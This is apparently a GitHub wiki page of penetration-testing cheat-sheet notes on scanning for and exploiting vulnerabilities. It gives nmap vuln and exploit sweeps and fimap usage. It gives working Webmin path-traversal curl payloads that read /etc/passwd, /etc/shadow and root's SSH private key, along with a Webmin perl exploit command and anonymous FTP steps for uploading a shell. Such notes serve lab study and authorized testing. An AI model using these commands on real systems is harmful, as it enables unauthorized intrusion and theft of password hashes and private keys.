-
Notifications
You must be signed in to change notification settings - Fork 14
Scan vulnerabilities
- Scan vulnerabilities from open ports and public services
- To search by images for initial ideas of attacked software
nmap -v --script=vuln victim-ip -T4
- nmap -v --script exploit -Pn x.x.x.1-254 -oG exploit-sweep.txt
- nmap -Pn -n -sV --script vuln victim_ip ===> Read the OS version, too.
nmap -p 139,445 --script=vuln victim_ip
nmap -v $ip --script smb-os-discovery.nse
- git clone https://github.com/kurobeats/fimap
./fimap.py -H -u 'http://x.x.x.71' -d 3 -w /tmp/urllist
./fimap.py -m -l /tmp/urllist
Attack ref:
- http://scx020c07c.blogspot.com/2012/09/privilege-escalation-pwnos.html
- https://github.com/jas502n/CVE-2019-15107/blob/master/CVE-2019-15107.gif
File disclosure
-
5 times:
curl http://victim_ip:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/etc/passwd
-
40 times:
curl http://victim_ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd
-
curl http://victim_ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow
-
curl http://victim_ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/root/.ssh/id_rsa.pub
-
curl http://victim_ip:10000//unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/root/.ssh/id_rsa
- nmap -Pn -n -sV -p80 --script http-rfi-spider.nse victim_ip
Ref:
- https://www.exploit-db.com/exploits/2017
- perl webmin.pl victim_ip 10000 /etc/passwd 0
- nmap -p 10000 10.11.1.1-254 -oG webmin-sweep.txt
- grep open webmin-sweep.txt | cut -d" " -f2
- ftp-proftpd-backdoor.nse
- ftp-vsftpd-backdoor.nse
- ftp-vuln-cve2010-4221.nse
- nmap -v -p 21 --script=ftp-anon.nse 10.11.1.1-254 -oG anon-ftp-sweep.txt
- grep open anon-ftp-sweep.txt | cut -d" " -f2
- ftp $ip ==> Username: anonymous ==> Password: blank
- FTP command line: https://tecadmin.net/download-upload-files-using-ftp-command-line/ and https://www.cs.colostate.edu/helpdocs/ftp.html
-
ftp -p $ip
=> Passive mode - ftp> ls
- ftp> cd uploads
-
ftp> binary
MUST CHANGE TO BINARY TO UPLOAD SHELL - ftp> put index.html
- ftp> delete index.html
- ftp> get index.html
- nc victim_ip 25